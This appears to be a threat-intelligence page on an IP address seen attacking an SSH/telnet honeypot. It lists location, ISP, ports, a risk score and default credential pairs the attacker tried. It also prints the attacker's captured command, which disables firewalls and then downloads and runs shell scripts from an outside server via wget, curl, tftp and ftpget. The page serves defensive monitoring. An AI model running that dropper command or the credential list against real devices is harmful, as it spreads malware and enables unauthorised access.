Active Threat • MEDIUM
176.65.148.214
Country of Origin🇳🇱 Netherlands
First Detection3/13/2026
Last Activity4/8/2026
ISPPfcloud UG (haftungsbeschrankt)
🎯
659
Total Attacks
🔌
2
Ports
📡
1
Attack Types
🦠
2
Malware
Geolocation
- Country
- 🇳🇱 Netherlands
- City
- Eygelshoven
- ASN
- AS51396
- ISP
- Pfcloud UG (haftungsbeschrankt)
Attack Types
ssh_telnet_honeypot
Attacked Ports
2223
Associated Malware
Attempted Credentials
🔐root/admin
3x🔐root/password
2x🔐root/default
2x🔐telnet/telnet
2x🔐admin/password
2x🔐cisco/cisco
2x🔐service/service
1x🔐netgear/netgear
1x🔐apc/apc
1x🔐root/root
1x🔐D-Link/admin
1x🔐root/vizxv
1x🔐asus/admin
1x🔐oracle/oracle
1x🔐root/666666
1xExecuted Commands
$
pkill iptables -9; pkill firewalld -9; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; busybox wget curl -o sshbins.sh http://88.214.20.14/sshbins.sh;curl -o sshbins.sh http://88.214.20.14/sshbins.sh; wget http://88.214.20.14/sshbins.sh; chmod 777 sshbins.sh; sh sshbins.sh; tftp 88.214.20.14 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 88.214.20.14; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 88.214.20.14 ftp1.sh ftp1.sh; sh ftp1.sh1x$
wget curl -o sshbins.sh http://88.214.20.14/sshbins.sh1xShodan InternetDB ExposureShodan
InternetDB data, not real-time
Ports
22
Hostnames
176.65.148.214.ptr.pfcloud.network
CPEs
cpe:/o:canonical:ubuntu_linuxcpe:/a:openbsd:openssh:8.9p1
Risk Assessment
55
/100
LowMediumHighCritical